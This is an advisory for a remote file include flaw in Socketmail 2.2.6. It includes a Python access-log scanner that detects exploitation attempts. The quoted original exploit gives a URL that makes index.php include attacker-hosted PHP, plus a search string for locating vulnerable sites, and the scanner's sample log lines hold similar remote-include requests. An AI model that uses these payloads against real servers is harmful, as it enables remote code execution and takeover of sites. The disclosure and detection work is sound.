Vendor: Socketmail
By: Aesthetico
CVSS: 7.5 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: Socketmail
Affected Version From: 2.2.6
Affected Version To: 2.2.6
Patch Exists: YES
Related CWE: CVE-2006-2590
CPE: a:creative_digital_resources:socketmail
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

Socketmail <= 2.2.6 - Remote File Include Vulnerability

Socketmail is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input passed in the site_path parameter of index.php. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation.

Mitigation:

Upgrade to version 2.2.7 or later.
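
For hosts that ran an affected version, web server access logs can be reviewed for requests that supplied site_path. The script below is an added example, not part of the original advisory or of Socketmail; the log format (Apache combined style), the sample lines and the verdict names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache log style (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [25/May/2006:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120
192.0.2.44 - - [25/May/2006:10:02:13 +0000] "GET /index.php?site_path=http://remote.example/x.php? HTTP/1.1" 200 312
192.0.2.44 - - [25/May/2006:10:02:40 +0000] "GET /mail/index.php?site_path=hTTp%3A%2F%2Fremote.example%2Fx.php%3F HTTP/1.1" 200 298
192.0.2.77 - - [25/May/2006:10:05:09 +0000] "GET /index.php?folder=inbox&page=2 HTTP/1.1" 200 4410
192.0.2.81 - - [25/May/2006:10:06:30 +0000] "GET /index.php?site_path=/var/www/inc/ HTTP/1.1" 200 100
"""

# Client address and request target from one log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with any URL scheme (http://, https://, ftp://, ...).
REMOTE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)


def scan(log_text):
    """Return (client, verdict, decoded_value) for each site_path seen.

    verdict is "remote-include" when the value is a URL, otherwise
    "param-present" (the parameter was supplied by the client at all,
    which is worth a manual look on an affected install).
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/index.php"):
            continue
        # parse_qsl percent-decodes names and values once, so encoded
        # forms such as http%3A%2F%2F are matched as well.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name != "site_path":
                continue
            verdict = "remote-include" if REMOTE.match(value) else "param-present"
            hits.append((client, verdict, value))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

Only parameters carried in the request line are visible this way; values sent in a POST body do not appear in a standard access log.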
Source

Exploit-DB raw data:

Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: Creative Digital Resources
URL: http://socketmail.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by SocketMail"
-----------------------------------------------------------------

Exploitation(tested with Lite-Edition and Pro-Edition):

/index.php?site_path=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-05-25]